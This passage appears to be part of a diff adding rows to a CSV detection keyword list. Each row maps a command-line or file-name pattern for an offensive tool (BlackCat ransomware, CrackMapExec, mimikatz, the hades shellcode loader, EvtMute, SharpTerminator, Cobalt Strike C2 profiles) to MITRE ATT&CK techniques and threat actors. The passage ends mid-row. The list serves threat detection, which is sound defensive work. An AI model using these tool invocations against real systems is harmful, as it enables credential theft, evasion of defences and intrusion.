+"*.exe --ui *","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.exe --winlogon * *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
+"*.exe --wmi *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
+"*.exe* -d localhost * -u * -p */24*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*.exe* -f *.bin -t queueuserapc*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z"
+"*.exe* --Filter *rule disable { condition: true }*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z"
+"*.exe* -t queueuserapc*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z"
+"*.exe* -t remotethread*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" 
+"*.exe* -t selfthread*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z"
+"*.exe* --technique queueuserapc*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z"
+"*.exe* --technique remotethread*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z"
+"*.exe* --technique selfthread*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z"
+"*.exe* -u administrator -H :*--shares*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*.exe*\Terminator.sys*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z"
+"*.exec*.interact.sh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C4","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z"
+"*.feeds.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*.files.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*.forums.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - 
APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*.ftp.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*.get_c2profile*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*.go.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*.groups.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.help.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.imap.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.img.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.interactsh.com","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C7","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*.kb.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.kerberoast.txt*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" +"*.kirbi *","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*.ldapdump.txt*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" +"*.lists.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.live.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.local.kirbi*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" +"*.m.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection 
controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.mail.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.media.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 